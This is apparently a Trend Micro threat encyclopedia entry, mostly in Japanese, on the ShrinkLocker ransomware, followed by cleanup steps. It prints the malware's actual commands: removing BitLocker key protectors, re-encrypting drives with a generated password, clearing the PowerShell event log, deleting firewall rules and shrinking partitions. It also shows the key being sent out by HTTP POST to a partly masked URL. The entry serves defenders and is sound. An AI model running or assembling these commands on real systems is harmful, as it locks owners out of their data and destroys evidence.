Ransom.VBS.SHRINKLOCKER.RG
Generic.VBS.ShrinkLocker.A.EABA5996 (BITDEFENDER)
Windows
- マルウェアタイプ: 身代金要求型不正プログラム(ランサムウェア)
- 破壊活動の有無: なし
- 暗号化: なし
- 感染報告の有無: はい
概要
トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のプロセスを追加します。
- bcdboot {Boot Drive}:\windows /s {New Drive} → reinstall the boot files on the new primary partitions
- reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPM /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /t REG_DWORD /d 1 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /t REG_DWORD /d 2 /f
- reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /t REG_DWORD /d 2 /f
- ServerManagerCmd -install BitLocker -allSubFeatures
- powershell.exe -Command Install-WindowsFeature BitLocker -IncludeAllSubFeature -IncludeManagementTools
- powershell.exe -Command "$protectors = (Get-BitLockerVolume -MountPoint {Target Drive}).KeyProtector; if ($protectors -ne $null) { foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint {Target Drive} -KeyProtectorId $protector.KeyProtectorId } }"
- powershell.exe -Command $a=ConvertTo-SecureString "'{Bitlocker Paassword}'" -asplaintext -force;Enable-BitLocker {Target Drive} -s -qe -pwp -pw $a
- powershell.exe -Command Resume-BitLocker -MountPoint {Target Drive}
- wevtutil -cl "Windows PowerShell"
- netsh advfirewall set allprofiles state on
- netsh advfirewall firewall delet rule name=all
- schtasks /Delete /TN "copy" /F
- schtasks /Delete /TN "disk" /F
他のシステム変更
マルウェアは、以下のレジストリ値を追加します。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = 1
(註:変更前の上記レジストリ値は、「1」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
scforceoption = 1
(註:変更前の上記レジストリ値は、「0」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseAdvancedStartup = 1
(註:変更前の上記レジストリ値は、「{User-defined value}」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
EnableBDEWithNoTPM = 1
(註:変更前の上記レジストリ値は、「0」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPM = 2
(註:変更前の上記レジストリ値は、「0」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMPIN = 2
(註:変更前の上記レジストリ値は、「0」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMKey = 2
(註:変更前の上記レジストリ値は、「0」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UseTPMKeyPIN = 2
(註:変更前の上記レジストリ値は、「0」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
EnableNonTPM = 1
(註:変更前の上記レジストリ値は、「0」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UsePartialEncryptionKey = 2
(註:変更前の上記レジストリ値は、「{User-defined value}」となります。)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\FVE
UsePIN = 2
(註:変更前の上記レジストリ値は、「0」となります。)
情報漏えい
マルウェアは、以下の情報を収集します。
- Hard Drive Used Space
- Hard Drive Free Space
- Hard Drive Label
- Total RAM
- Used RAM
- Available RAM
- Computer Name
- Available Fixed Drives
- Generated Bitlocker Encryption Key
- Network Performance
情報収集
マルウェアは、HTTPポスト を介して、収集した情報を以下のURLに送信します。
- https://{BLOCKED}ted-eating-meals-top.trycloudflare.com/updatelog
その他
マルウェアは、以下を実行します。
- It terminates itself if the current domain is different from its target domain.
- It terminates and deletes itself if the name of the operating system contains “xp”, “2000”, “2003”, or “vista”.
- It issues the following commands to diskpart to do the following:
- Shrink the size of non-boot partitions by 100 MB
- Select Volume {Target Drive}
- shrink desired=100
- exit
- Split the unallocated space into new 100 MB primary partitions. Format these partitions with the override parameter, assign a file system and a drive letter to each. Activate these partitions.
- Select Volume {Target Drive}
- create partition primary size=100
- format quick recommended override
- assign
- active
- exit
- Remove the drive letter from the selected partition.
- Select Volume {New Drive}
- remove
- exit
- Shrink the size of non-boot partitions by 100 MB
- It starts the BitLocker Drive Encryption Service (BDESVC) if it is not running.
- It changes the boot drive label into the attacker’s email.
- It deletes the following files if the computer name is "MWIDC001":
- \\{Target Domain Name}\SYSVOL\{Target Domain Name}\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
- \\{Target Domain Name}\SYSVOL\{Target Domain Name}\scripts\Logon.vbs
- \\{Target Domain Name}\SYSVOL\{Target Domain Name}\scripts\disk.vbs
- It disables BitLocker's encryption key protector and deletes them. It then allows for a numerical password to be used as a protector and for encryption to be turned on.
- It generates a random encryption key for Bitlocker using the following information as seed:
- Pre-specified characters
- Hard Drive Used Space
- Hard Drive Free Space
- Total RAM
- Used RAM
- Available RAM
- Network Performance
- It enables Bitlocker on the drives found in the affected machine using its generated encryption key.
- It shows the following prompt when the affected machine reboots:
<補足>
インストール
マルウェアは、以下のプロセスを追加します。
- bcdboot {起動ドライブ}:\windows /s {新しいドライブ} → 新しいプライマリパーティション上にブートファイルを再インストールする
情報漏えい
マルウェアは、以下の情報を収集します。
- ハードドライブの使用中の容量
- ハードドライブの空き容量
- ハードドライブのラベル
- RAMの総容量
- 使用中のRAM
- 利用可能なRAM
- コンピュータ名
- 利用可能な固定ドライブ
- 生成されたBitLockerの暗号化キー
- ネットワークのパフォーマンス
その他
マルウェアは、以下を実行します。
- 対象とするドメインと現在のドメインが異なる場合は、自身の不正活動を終了します。
- オペレーティングシステム(OS)の名前に「xp」、「2000」、「2003」、または「vista」が含まれている場合、不正活動を終了して自身を削除します。
- 以下を実行するために、 コマンドラインユーティリティ「diskpart」に以下のコマンドを送信します。
- 非ブートパーティションのサイズを100MB縮小させる
- Select Volume {対象とするドライブ}
- shrink desired=100
- exit
- 上記の未割り当て領域を新しいプライマリパーティション(100MB)内で分割する。これらのパーティションをoverrideパラメータでフォーマットし、それぞれにファイルシステムおよびドライブ文字を割り当てる。そして、これらのパーティションをアクティブ化する。
- Select Volume {対象とするドライブ}
- create partition primary size=100
- format quick recommended override
- assign
- active
- exit
- 選択したパーティションからドライブ文字を削除する
- Select Volume {新しいドライブ}
- remove
- exit
- 非ブートパーティションのサイズを100MB縮小させる
- BitLocker Drive Encryption Service(BDESVC)が実行されていない場合は、開始します。
- 起動ドライブのラベルを攻撃者の電子メールアドレスに変更します。
- コンピュータ名が「MWIDC001」の場合、以下のファイルを削除します。
- \\{対象とするドメイン名}\SYSVOL\{対象とするドメイン名}\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
- \\{対象とするドメイン名}\SYSVOL\{対象とするドメイン名}\scripts\Logon.vbs
- \\{対象とするドメイン名}\SYSVOL\{対象とするドメイン名}\scripts\disk.vbs
- Windowsの暗号化ツール「BitLocker」の暗号化キープロテクタを無効にして削除します。その後、数字のパスワードをプロテクタとして使用し、暗号化を有効にします。
- 以下の情報をシードとして使用して、Bitlockerの暗号化キーをランダムに生成します。
- 事前に指定された文字
- ハードドライブの使用中の容量
- ハードドライブの空き容量
- RAMの総容量
- 使用中のRAM
- 利用可能なRAM
- ネットワークのパフォーマンス
- 生成された暗号化キーを使用して、影響を受けるコンピュータ内のドライブ上でBitlockerを有効にします。
- 影響を受けるコンピュータが再起動された場合、以下のプロンプトを表示します。
対応方法
手順 1
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
暗号化されたファイルをバックアップから復元します。
手順 3
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Ransom.VBS.SHRINKLOCKER.RG」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください